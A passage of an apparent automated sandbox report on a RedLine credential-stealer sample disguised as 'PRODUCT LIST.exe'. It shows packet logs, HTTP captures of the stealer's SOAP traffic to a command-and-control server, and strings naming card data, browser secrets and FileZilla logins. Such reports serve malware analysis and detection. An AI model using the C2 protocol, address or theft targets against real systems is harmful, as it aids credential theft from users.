                                                                                      Nov 24, 2024 11:49:16.133960962 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.133972883 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.133984089 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.133995056 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.134006023 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.134016991 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.134028912 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.134035110 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.134035110 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:16.253643990 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299760103 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299781084 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299793005 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299804926 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299817085 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:16.299846888 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:17.482080936 CET1638349706104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:17.483273983 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:17.537122011 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:17.602912903 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:17.603044987 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:17.603183031 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:17.722768068 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:17.959225893 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:18.080063105 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080178022 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:18.080210924 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080224991 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080238104 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080286980 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:18.080286980 CET4970716383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:18.080329895 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080342054 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080651999 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.080732107 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.081258059 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.081542969 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.199924946 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.200068951 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.200081110 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.200135946 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.200191975 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.247931004 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:18.999927998 CET1638349707104.219.234.170192.168.2.5
                                                                                      Nov 24, 2024 11:49:19.018763065 CET4970616383192.168.2.5104.219.234.170
                                                                                      Nov 24, 2024 11:49:19.018903017 CET4970716383192.168.2.5104.219.234.170

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 24, 2024 11:49:12.252300024 CET5949353192.168.2.51.1.1.1

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 24, 2024 11:49:12.252300024 CET192.168.2.51.1.1.10xb122Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 24, 2024 11:49:12.390635967 CET1.1.1.1192.168.2.50xb122No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • 104.219.234.170:16383

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549704104.219.234.170163835032C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 11:49:04.539392948 CET242OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 137
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      Nov 24, 2024 11:49:05.966825008 CET359INHTTP/1.1 200 OK
                                                                                      Content-Length: 212
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:05 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                      Nov 24, 2024 11:49:11.026755095 CET225OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 144
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Nov 24, 2024 11:49:11.719696999 CET1236INHTTP/1.1 200 OK
                                                                                      Content-Length: 54852
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:11 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>91.232.174.157</b:string><b:string>128.90.170.13</b:string><b:string>1.192.194.168</b:string><b:string>1.192.194.168</b:string><b:string>144.48.39.108</b:string><b:string>149.22.81.166</b:string><b:string>37.120.207.190</b:string><b:string>154.16.169.89</b:string><b:string>178.208.168.4</b:string><b:string>128.90.60.18</b:string><b:string>37.19.212.105</b:string><b:string>128.90.170.18</b:string><b:string>37.19.212.105</b:string><b:string>37.19.212.105</b:string><b:string>128.90.170.18</b:string><b:string>37.19.212.105</b:string><b:string>138.199.21.219</b:string><b:string>139.186.206.86</b:s [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549706104.219.234.170163835032C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 11:49:16.007179976 CET222OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 20789
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Nov 24, 2024 11:49:17.482080936 CET294INHTTP/1.1 200 OK
                                                                                      Content-Length: 147
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:17 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549707104.219.234.170163835032C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 11:49:17.603183031 CET242OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 20781
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      Nov 24, 2024 11:49:18.999927998 CET408INHTTP/1.1 200 OK
                                                                                      Content-Length: 261
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:18 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:05:49:01
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\PRODUCT LIST.exe"
                                                                                      Imagebase:0x1f0000
                                                                                      File size:1'776'640 bytes
                                                                                      MD5 hash:A9B805862CCEE6848CE91EF51A31F71D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:05:49:02
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:14.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:32
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 27372 1000871 27376 10008c8 27372->27376 27381 10008d8 27372->27381 27373 1000889 27377 10008fa 27376->27377 27386 1000ce0 27377->27386 27390 1000ce8 27377->27390 27378 100093e 27378->27373 27382 10008fa 27381->27382 27384 1000ce0 GetConsoleWindow 27382->27384 27385 1000ce8 GetConsoleWindow 27382->27385 27383 100093e 27383->27373 27384->27383 27385->27383 27387 1000d26 GetConsoleWindow 27386->27387 27389 1000d56 27387->27389 27389->27378 27391 1000d26 GetConsoleWindow 27390->27391 27393 1000d56 27391->27393 27393->27378 27352 1000848 27353 1000856 27352->27353 27356 1001251 27353->27356 27357 100125a 27356->27357 27358 10013c2 27357->27358 27364 1001870 27357->27364 27368 1001863 27357->27368 27359 1001432 27358->27359 27362 1001870 KiUserExceptionDispatcher 27358->27362 27363 1001863 KiUserExceptionDispatcher 27358->27363 27362->27359 27363->27359 27366 1001893 27364->27366 27365 1001897 27365->27357 27366->27365 27367 10018ba KiUserExceptionDispatcher 27366->27367 27367->27365 27369 1001893 27368->27369 27370 10018ba KiUserExceptionDispatcher 27369->27370 27371 1001897 27369->27371 27370->27371 27371->27357

                                                                                        Executed Functions

                                                                                        Function 064D96D0 Relevance: 13.7, Strings: 10, Instructions: 1184COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (_{q$(_{q$4c{q$4c{q$Nvzq$${q$${q$${q$c{q$c{q
                                                                                        • API String ID: 0-1208683559
                                                                                        • Opcode ID: 0a5da02839c8f46e9b2e00da26972599fb2436219c0e877f35b9b84b0d05bcc1
                                                                                        • Instruction ID: 813bd696bd8653040482cf1947918e167248e28e8bc0cd47e668af42acd8fca7
                                                                                        • Opcode Fuzzy Hash: 0a5da02839c8f46e9b2e00da26972599fb2436219c0e877f35b9b84b0d05bcc1
                                                                                        • Instruction Fuzzy Hash: 47825574F041188FDBA5AB7D982126D7AD3BFCD700B60486ED01ADB351EE25CD878B92
                                                                                        Function 064DDAD0 Relevance: 11.9, Strings: 9, Instructions: 689COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 413 64ddad0-64ddb00 415 64ddb18-64ddb28 413->415 416 64ddb02-64ddb0b 413->416 419 64ddb2a-64ddb40 415->419 420 64ddb61-64ddb6c 415->420 601 64ddb0d call 64dddb8 416->601 602 64ddb0d call 64ddac4 416->602 603 64ddb0d call 64ddad0 416->603 418 64ddb13 421 64ddd25-64ddd31 418->421 424 64ddb56-64ddb5c 419->424 425 64ddb42-64ddb51 419->425 426 64ddb6e-64ddb79 420->426 427 64ddb7b-64ddb87 420->427 424->421 425->421 426->427 431 64ddb8c-64ddbae 426->431 427->421 435 64ddbf5-64ddc0f 431->435 436 64ddbb0-64ddbd0 431->436 441 64ddcef-64ddd03 435->441 442 64ddc15-64ddc25 435->442 443 64ddd23 436->443 453 64ddd05-64ddd11 441->453 454 64ddd13-64ddd19 441->454 444 64ddc8b-64ddca8 442->444 445 64ddc27-64ddc2d 442->445 443->421 458 64ddcaf-64ddcd0 444->458 446 64ddc2f-64ddc31 445->446 447 64ddc3b-64ddc89 445->447 446->447 447->458 453->421 455 64ddd1b-64ddd21 454->455 456 64ddd34-64dde01 454->456 455->421 455->443 475 64ddecf-64ddedd 456->475 476 64dde07-64dde33 call 64dda00 456->476 458->443 480 64ddedf-64ddef2 475->480 481 64ddf39-64ddf3d 475->481 485 64dde35-64dde4f 476->485 486 64dde54-64dde58 476->486 480->481 492 64ddef4-64ddf13 480->492 482 64ddf4d-64ddf54 481->482 483 64ddf3f-64ddf4b 481->483 493 64ddf57-64ddf7f 482->493 483->482 483->493 506 64de2a3-64de2af 485->506 489 64dde79 486->489 490 64dde5a-64dde63 486->490 497 64dde7c-64dde81 489->497 494 64dde6a-64dde6d 490->494 495 64dde65-64dde68 490->495 508 64de2a0 492->508 516 64de195-64de1a0 493->516 517 64ddf85-64ddf93 493->517 498 64dde77 494->498 495->498 497->475 499 64dde83-64dde87 497->499 498->497 503 64dde89-64ddea4 499->503 504 64ddec0-64ddec6 499->504 503->504 512 64ddea6-64ddeac 503->512 504->475 508->506 514 64de2b2-64de2c6 512->514 515 64ddeb2-64ddebb 512->515 529 64de2cd-64de330 514->529 515->506 524 64de1d5-64de20e 516->524 525 64de1a2-64de1b9 516->525 521 64de43d-64de454 517->521 522 64ddf99-64ddfac 517->522 533 64ddfae-64ddfbb 522->533 534 64ddfd7-64ddfe5 522->534 531 64de264-64de277 524->531 532 64de210-64de227 524->532 525->524 538 64de1bb-64de1c1 525->538 543 64de337-64de367 529->543 535 64de279 531->535 547 64de230-64de232 532->547 533->534 545 64ddfbd-64ddfc3 533->545 534->521 542 64ddfeb-64de000 534->542 535->508 538->543 544 64de1c7-64de1d0 538->544 554 64de020-64de098 542->554 555 64de002-64de01b 542->555 565 64de369-64de3cc 543->565 566 64de3d3-64de436 543->566 544->506 545->529 548 64ddfc9-64ddfd2 545->548 551 64de234-64de251 547->551 552 64de253-64de262 547->552 548->506 551->535 552->531 552->532 568 64de09e-64de0a5 554->568 555->568 565->566 566->521 568->516 571 64de0ab-64de0e4 568->571 578 64de0e6-64de10d call 64dda00 571->578 579 64de150-64de163 571->579 590 64de10f-64de12c 578->590 591 64de12e-64de14e 578->591 583 64de165 579->583 583->516 590->583 591->578 591->579 601->418 602->418 603->418
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'{q$4c{q$4c{q$4c{q$${q$${q$${q$${q$${q
                                                                                        • API String ID: 0-1993960650
                                                                                        • Opcode ID: cda2dbf722fde72e97095b9cfabddec6b5b04b55a78192ef7cc565fa23da7def
                                                                                        • Instruction ID: 4ddd11e8598f2ab4c09a966b4126ff0288ce969bac8a9dd2c6d43f5112444b73
                                                                                        • Opcode Fuzzy Hash: cda2dbf722fde72e97095b9cfabddec6b5b04b55a78192ef7cc565fa23da7def
                                                                                        • Instruction Fuzzy Hash: 31423E70F002199FDB55DF79C864AAEBBF6AF88340F14846AE405EB365DE349D42CB90
                                                                                        Function 0100E7B0 Relevance: .9, Instructions: 927COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2199105778.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1000000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 969fd6c7c189a5bf4d55ef41dd79d72459157da8a9f7507356e5c3bfb9eef18d
                                                                                        • Instruction ID: a18ad1692b77234a2c8299986b93579e748dd21dca41deb8d0f11f1473dfed32
                                                                                        • Opcode Fuzzy Hash: 969fd6c7c189a5bf4d55ef41dd79d72459157da8a9f7507356e5c3bfb9eef18d
                                                                                        • Instruction Fuzzy Hash: CA820F74B002548FDB55DF68D899B9DBBB2BF88300F1085A9E54AAB3A1DF349D81CF50
                                                                                        Function 064D4508 Relevance: .8, Instructions: 814COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8245a4617307026d11aaf6e2cd09350d7994d9ca10d772e7cb2cc09fcf0f7957
                                                                                        • Instruction ID: 3098e33ab8f55ab214fc54d2dc0718a9e14cc65a886443cac8993cc3a766fa47
                                                                                        • Opcode Fuzzy Hash: 8245a4617307026d11aaf6e2cd09350d7994d9ca10d772e7cb2cc09fcf0f7957
                                                                                        • Instruction Fuzzy Hash: 53829D74A10656CFDBA9CF28D858B6A77F2EB44308F1041E9D909DB3A6EB349C45CF90
                                                                                        Function 064D33C0 Relevance: .5, Instructions: 480COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 349c6e09ebd33c2df45a2bec0576c315627995d8ed5f81ddf825c250724f7534
                                                                                        • Instruction ID: 0c18fecd045b8221f3b8ca32b1d42ebf8112f17d645c53be5f7f5634829ee6f3
                                                                                        • Opcode Fuzzy Hash: 349c6e09ebd33c2df45a2bec0576c315627995d8ed5f81ddf825c250724f7534
                                                                                        • Instruction Fuzzy Hash: 9C12D271E14256CFCB56CF74C4602ADFBF2EF86300F2486AAD415AB341DB359A86CB91
                                                                                        Function 064DD5C8 Relevance: .4, Instructions: 433COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e6a88d06d3161122daa6cb3a2d098786f886c32eed170abfe1bdaf1f93fe9954
                                                                                        • Instruction ID: 8bc2651b736dbd8568e244b637be7815fc70b78af2aa7f0ea68d032b349b71b1
                                                                                        • Opcode Fuzzy Hash: e6a88d06d3161122daa6cb3a2d098786f886c32eed170abfe1bdaf1f93fe9954
                                                                                        • Instruction Fuzzy Hash: F1F1D171E04266CFCB56DF75C4601AEFBF2AF85300B14C5A6E859EB240E774DA86CB90
                                                                                        Function 064DEA00 Relevance: 10.2, Strings: 8, Instructions: 193COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 604 64dea00-64dea85 call 64d5f20 612 64dea8b-64dea94 604->612 613 64dec95-64deca8 604->613 615 64decaa 612->615 616 64dea9a-64deaaf 612->616 614 64decaf-64decb3 613->614 617 64decbe 614->617 618 64decb5 614->618 615->614 621 64deab5-64deaf2 616->621 622 64deab1-64deab3 616->622 620 64decbf 617->620 618->617 620->620 623 64deafa-64deafc 621->623 622->623 624 64deafe-64deb04 623->624 625 64deb14-64deb1a 623->625 627 64deb08-64deb0a 624->627 628 64deb06 624->628 629 64deb1c-64deb1e 625->629 630 64deb20-64deb65 625->630 627->625 628->625 631 64deb6f-64deb71 629->631 645 64deb6d 630->645 634 64deb89-64deb8d 631->634 635 64deb73-64deb79 631->635 638 64deb8f-64deb99 634->638 639 64deb9b 634->639 636 64deb7d-64deb87 635->636 637 64deb7b 635->637 636->634 637->634 640 64deba0-64deba2 638->640 639->640 642 64dec4e-64dec67 640->642 643 64deba8-64debb1 640->643 648 64dec69 642->648 649 64dec72-64dec8f 642->649 643->642 650 64debb7-64dec3b 643->650 645->631 648->649 649->612 649->613 658 64dec42-64dec47 650->658 658->642
                                                                                        Strings
                                                                                        • [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\d, xrefs: 064DEBFF
